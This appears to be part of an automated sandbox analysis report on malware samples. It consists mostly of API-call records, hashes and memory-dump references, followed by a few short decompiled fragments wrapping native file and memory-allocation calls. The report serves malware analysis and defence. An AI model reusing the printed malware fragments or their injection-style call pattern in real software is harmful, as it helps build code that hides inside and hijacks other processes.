                                                        • Instruction ID: 9912d6609bd8a990eabf68940a3d2b52de4f1c36f86f287361aae770496f7fa6
                                                        • Opcode Fuzzy Hash: ca01ae02aa8da45e4acdd178e1670c5de97976db7925d415ea1e87aeb3c3decc
                                                        • Instruction Fuzzy Hash: 242107B1D003599FCB10DFAAC884AEEBBF5FF48310F54842EE519A7240C7799944DBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 2e0bff2-2e0c08c, API call: DuplicateHandle)
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0BFBE,?,?,?,?,?), ref: 02E0C07F
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 3244f7a3cee69af2c743b54adcd6775878e076b4a3394acfccf34f1d93e0d224
                                                        • Instruction ID: d2dd28520bd545a9acfb4fcb64300e8f6c66d8d781a62b6a8412780400068e61
                                                        • Opcode Fuzzy Hash: 3244f7a3cee69af2c743b54adcd6775878e076b4a3394acfccf34f1d93e0d224
                                                        • Instruction Fuzzy Hash: 0421E4B5D002089FDB10CFA9D984ADEBBF4EF48310F14841AE854B7350D374A945DFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (graph not reproduced; first node 86b2d1a-86b2d9b, API call: VirtualAllocEx)
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 086B2D8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 3e5dd48bb7f62dfa6b39d5c56c12bb2725854869a96ba31d50c0bcd0f50b5992
                                                        • Instruction ID: 7ca0d662509d1c5e6f982a11fe61ef7ea2d9a28d1db62bfde74a92dd9df805fb
                                                        • Opcode Fuzzy Hash: 3e5dd48bb7f62dfa6b39d5c56c12bb2725854869a96ba31d50c0bcd0f50b5992
                                                        • Instruction Fuzzy Hash: C01147729002489FCB10DFAAD8446DEBBF5EF48320F148819E415A7650CB75A940CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E09D59,00000800,00000000,00000000), ref: 02E09F6A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 30aa41f9d09e568d875dcfd28db0df33ec2332dc60503e9ba1568dfe57efc277
                                                        • Instruction ID: 1c3df97b5426ba4ac4a684862d265918848f3bf45b579e7b456cdac73bd24813
                                                        • Opcode Fuzzy Hash: 30aa41f9d09e568d875dcfd28db0df33ec2332dc60503e9ba1568dfe57efc277
                                                        • Instruction Fuzzy Hash: 391114B69002098FCB10CF9AC884BEEFBF8EB88714F14842AE455B7241C774A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 086B2D8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 569a68e0ceb209effc23304ab745b6bc42f777d01029220453f494c984827f2f
                                                        • Instruction ID: 664bffcd99b4cede3bcce1c8ebb3c513c080d1f9a5deec43afa2611e50d93998
                                                        • Opcode Fuzzy Hash: 569a68e0ceb209effc23304ab745b6bc42f777d01029220453f494c984827f2f
                                                        • Instruction Fuzzy Hash: D51137729002499FCB10DFAAC844BDFBFF5EF88324F148819E515A7250CB75A950DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E09D59,00000800,00000000,00000000), ref: 02E09F6A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: cf70fcea75b1bfcef8f887c6016eac1ed1685d35e813e9de7df7ed7256a1e77b
                                                        • Instruction ID: a77c4024035b765fc0312ac93485108f44456dc84e7d43e8d0a24ff1257202d1
                                                        • Opcode Fuzzy Hash: cf70fcea75b1bfcef8f887c6016eac1ed1685d35e813e9de7df7ed7256a1e77b
                                                        • Instruction Fuzzy Hash: 3511F6B6D002098FCB10CF9AC584BDEFBF4AB48714F14842AD455B7641C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3d21688adae13de1eb72be5110583b9b5f1bb6445016470a9705f49c49f19c91
                                                        • Instruction ID: df98de4b9ffbd6bf2661990cf905c7b829be7f25b582d6411fca9c2fb6fe58ef
                                                        • Opcode Fuzzy Hash: 3d21688adae13de1eb72be5110583b9b5f1bb6445016470a9705f49c49f19c91
                                                        • Instruction Fuzzy Hash: 3A1158B1D002488ECB10DFAAC5447EEFBF4AF88324F14881ED459B7740C779A944CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 2ebd6167606a3030423fa9dd077340af428d0baf5eec4adce092f99fd9b8302d
                                                        • Instruction ID: 49d89e59cd2879b9bcf0d5c93826da79d3ac0c519892975beceff1af1d12446d
                                                        • Opcode Fuzzy Hash: 2ebd6167606a3030423fa9dd077340af428d0baf5eec4adce092f99fd9b8302d
                                                        • Instruction Fuzzy Hash: 9B1125B58003498FCB10CF9AC588BDEBFF4EB48320F14846AD455A7741D778A585DFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,086B5211,?,?), ref: 086B53B8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: aa73c4c1ee02012648ea03f412c7c62a621e0d71e547fa236302f40a46c52b48
                                                        • Instruction ID: e93a87d808f061ffdbadf615a73283f67f0280d9c9f5536c9d712c9b33d6a737
                                                        • Opcode Fuzzy Hash: aa73c4c1ee02012648ea03f412c7c62a621e0d71e547fa236302f40a46c52b48
                                                        • Instruction Fuzzy Hash: 8B1136B59007098FCB10DF9AC588BEEBBF4EB48324F148429E459B7340D378A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3970e82d5706dad91c9b52bfe88f4a4074ff9893e53722af82cd6dc9dd2cfdba
                                                        • Instruction ID: 9b1decb55c641144d9d2b41564f83e401116928e30a20610533f7143da325631
                                                        • Opcode Fuzzy Hash: 3970e82d5706dad91c9b52bfe88f4a4074ff9893e53722af82cd6dc9dd2cfdba
                                                        • Instruction Fuzzy Hash: E111F5B1D002498FDB10DFAAC8447EEBBF5AB88724F148829D419B7240CB79A944CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 9a90a28bfd60a265ce2fd918c7c329615af6e2a7d5b910ca19e340b4a47af5c7
                                                        • Instruction ID: 24624f604217be5594beffd79cb7811a0d4e7e199779c46dac8027c953465c68
                                                        • Opcode Fuzzy Hash: 9a90a28bfd60a265ce2fd918c7c329615af6e2a7d5b910ca19e340b4a47af5c7
                                                        • Instruction Fuzzy Hash: 2A11D2B5D002498FCB10CF9AC584ADEFBF4AB88624F14846AD419B7651C374A585CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 086B449D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 52f8278418e41da30d827067ae3274649c2da010b177c368c364cdf897618327
                                                        • Instruction ID: 0c105777290606424efb48c83dd98ec201ee0557b7f84eb2e65ce2d838213918
                                                        • Opcode Fuzzy Hash: 52f8278418e41da30d827067ae3274649c2da010b177c368c364cdf897618327
                                                        • Instruction Fuzzy Hash: D11122B58002499FCB10CF9AC588BDEBBF4EB48324F10841AE854A7201C374A984CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E09CDE
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.449243058.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2e00000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 63f30540705a770e13f0d9b57d584e8e9cf3b28078c7fca60f24cebee43daa24
                                                        • Instruction ID: 83f551756451d8f7fe906546e86144018a48851ef84b34b4fd1d32eeb58d0a3a
                                                        • Opcode Fuzzy Hash: 63f30540705a770e13f0d9b57d584e8e9cf3b28078c7fca60f24cebee43daa24
                                                        • Instruction Fuzzy Hash: 5E11E3B6D00209CFCB10CF9AC5847DEFBF4AF48614F14845AD419B7651C374A585CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 086B449D
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.457822496.00000000086B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 086B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_86b0000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 5aa7c0ab90cf83ceb3e6f821bd7cbc49cf3cab9a259c4576ed46d843b9f7a31c
                                                        • Instruction ID: 175300d5a0afc21e29c24aef53b70ec145c2a00cadfa17040c012ee8f247f5d0
                                                        • Opcode Fuzzy Hash: 5aa7c0ab90cf83ceb3e6f821bd7cbc49cf3cab9a259c4576ed46d843b9f7a31c
                                                        • Instruction Fuzzy Hash: 911115B58003099FCB10CF9AC584BDEBBF8EB48324F108419E414B7200C374A584CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 638f246629efddd4a60ff4fd207988fe6dd072e9b1b183a8fbc1e3ae8c8154e9
                                                        • Instruction ID: 140ff7ea981c3bf6aa2bfe2e9083a8a8777c62471a009e914606ded4f8f88cb4
                                                        • Opcode Fuzzy Hash: 638f246629efddd4a60ff4fd207988fe6dd072e9b1b183a8fbc1e3ae8c8154e9
                                                        • Instruction Fuzzy Hash: 7E212479904240DFDB45DF58D8C0B27BF61FB98B28F20857ED8050B226C336D846C6E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ded547a9f524debfa7eb70ac89e6c0cec97eece74878d9a0733082edcf0829d8
                                                        • Instruction ID: 532ed75cf59e81b45c14e78d4e67468ef6d8dc9aea5a9987dfae3660ef7638cb
                                                        • Opcode Fuzzy Hash: ded547a9f524debfa7eb70ac89e6c0cec97eece74878d9a0733082edcf0829d8
                                                        • Instruction Fuzzy Hash: 562125B1904240DFDF16DF58D8D0B16BBA5FBC4358F24C96AD84A0B396C336D847CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 88cdc395bbf5ae10b229e8c439d332845a8ef135623aa452d638d8837552c88c
                                                        • Instruction ID: 6078aeae70fd96fbad43804f21207afa758c2002e2b79f0e0d09c6279d705308
                                                        • Opcode Fuzzy Hash: 88cdc395bbf5ae10b229e8c439d332845a8ef135623aa452d638d8837552c88c
                                                        • Instruction Fuzzy Hash: 05210771904240EFDF05DF98D9D0B26BBA5FB84324F24CA6ED8494B3A6C736D846CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4dfb8ecab0b6ebc778cc6d66c60bacd621a18f2c2b7d2bc8c7bf9b38add7105a
                                                        • Instruction ID: f56a66afba18cfcdd55c52660776db490fd0b90bab824e644d2640dab937c0d7
                                                        • Opcode Fuzzy Hash: 4dfb8ecab0b6ebc778cc6d66c60bacd621a18f2c2b7d2bc8c7bf9b38add7105a
                                                        • Instruction Fuzzy Hash: 342171755083809FCB03CF24D994712BF71EB86214F28C5EAD8458F6A7C33A9846CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction ID: e0f1637c572bcf92a51a9607975ee493391b53b4e681fe2c38260fb33784901a
                                                        • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                        • Instruction Fuzzy Hash: 1411DF76804280CFCB02CF14D9C0B16BF71FB84724F2486AED8440B62AC336D456CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448534835.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14dd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction ID: 5f68031fa4c3095d86f721d2a818634f6c7726d35a929100663a785e81e5a141
                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                        • Instruction Fuzzy Hash: 3A11BB75904280DFDB02CF54C5D0B16BBB1FB84324F28C6AED8494B7A6C33AD44ACB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7a39a3e89b4d4d89e60d253539089a20cb3f0fce67aa4f8eb01bbebc035d828
                                                        • Instruction ID: eb8cecfb01dcfca0ae5dd7c49f84411c6a91f94aac4a1c7874fdc97ab521a3da
                                                        • Opcode Fuzzy Hash: b7a39a3e89b4d4d89e60d253539089a20cb3f0fce67aa4f8eb01bbebc035d828
                                                        • Instruction Fuzzy Hash: C001D4799093C0AAE7615E59CC84B67BF98EF41A24F08853FE9051A356D3789841C6F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.448481186.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_14cd000_hkkRsa.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9675870ae6caee7cb4e0f78d71c413c81f81b8863b3b13eca23602612ced7c6f
                                                        • Instruction ID: 00683fd7258797aa698aa4f4098fc6ccebfbfd1efebf460ff199e9fc38a296e0
                                                        • Opcode Fuzzy Hash: 9675870ae6caee7cb4e0f78d71c413c81f81b8863b3b13eca23602612ced7c6f
                                                        • Instruction Fuzzy Hash: ECF0A4758052849EE7518E59CCC4B63FF98EB81634F18C46EED081B386C2749844CAB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:1.4%
                                                        Dynamic/Decrypted Code Coverage:3%
                                                        Signature Coverage:8.9%
                                                        Total number of Nodes:202
                                                        Total number of Limit Nodes:34

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 41a41a-41a469 call 41af70 NtReadFile
                                                        C-Code - Quality: 25%
                                                        			E0041A41A(void* __ecx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
                                                        				intOrPtr _v0;
                                                        				void* _t20;
                                                        				void* _t31;
                                                        				void* _t32;
                                                        				intOrPtr* _t33;
                                                        				void* _t35;
                                                        
                                                        				asm("lodsb");
                                                        				 *((intOrPtr*)(__edx - 0x74aa29d4)) =  *((intOrPtr*)(__edx - 0x74aa29d4)) + __ecx;
                                                        				_t15 = _v0;
                                                        				_t33 = _v0 + 0xc48;
                                                        				E0041AF70(_t31, _v0, _t33,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
                                                        				_t6 =  &_a36; // 0x414a31
                                                        				_t8 =  &_a28; // 0x414d72
                                                        				_t14 =  &_a4; // 0x414d72
                                                        				_t20 =  *((intOrPtr*)( *_t33))( *_t14, _a8, _a12, _a16, _a20, _a24,  *_t8, _a32,  *_t6, _t32, _t35, cs); // executed
                                                        				return _t20;
                                                        			}










                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: 7cef21edbfbccbfc31dadf7b1b626fbf065f0b8d0a8c28913a23cb3ae2dcbcfd
                                                        • Instruction ID: 82e1c0b5f6663241e0a7dc0ec794f0da47cbc8f95d1202383f3b0bd63db2f2f1
                                                        • Opcode Fuzzy Hash: 7cef21edbfbccbfc31dadf7b1b626fbf065f0b8d0a8c28913a23cb3ae2dcbcfd
                                                        • Instruction Fuzzy Hash: 9EF0F9B6200109AFCB04DF99DC84DEB7BA9EF8C354F158259BE0D97241C634E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 3 41a420-41a436 4 41a43c-41a469 NtReadFile 3->4 5 41a437 call 41af70 3->5 5->4
                                                        C-Code - Quality: 37%
                                                        			E0041A420(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                        				void* _t18;
                                                        				void* _t27;
                                                        				intOrPtr* _t28;
                                                        
                                                        				_t13 = _a4;
                                                        				_t28 = _a4 + 0xc48;
                                                        				E0041AF70(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                        				_t4 =  &_a40; // 0x414a31
                                                        				_t6 =  &_a32; // 0x414d72
                                                        				_t12 =  &_a8; // 0x414d72
                                                        				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                        				return _t18;
                                                        			}







                                                        APIs
                                                        • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A465
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID: 1JA$rMA$rMA
                                                        • API String ID: 2738559852-782607585
                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction ID: 853ae5a9cbf7dd52acbc9bf2bbd942333817209f7ae892279ddd8fb5cf099807
                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                        • Instruction Fuzzy Hash: EBF0A4B6200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97251D630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 97 41a370-41a3c1 call 41af70 NtCreateFile
                                                        C-Code - Quality: 100%
                                                        			E0041A370(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                        				long _t21;
                                                        				void* _t31;
                                                        
                                                        				_t3 = _a4 + 0xc40; // 0xc40
                                                        				E0041AF70(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                        				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                        				return _t21;
                                                        			}






                                                        APIs
                                                        • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3BD
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction ID: db220115459d8e284863bd9c0c46ad68448eb9d788840dc0e4734df984f4989a
                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                        • Instruction Fuzzy Hash: C3F0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 100 41a550-41a58d call 41af70 NtAllocateVirtualMemory
                                                        C-Code - Quality: 100%
                                                        			E0041A550(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                        				long _t14;
                                                        				void* _t21;
                                                        
                                                        				_t3 = _a4 + 0xc60; // 0xca0
                                                        				E0041AF70(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                        				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                        				return _t14;
                                                        			}






                                                        APIs
                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B144,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A589
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateMemoryVirtual
                                                        • String ID:
                                                        • API String ID: 2167126740-0
                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction ID: 0e5d983f4d7433d3b56fd13b6aea7c1fda5e5f7f579047cba8cb0cdbad6970d5
                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                        • Instruction Fuzzy Hash: 0BF015B6200208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
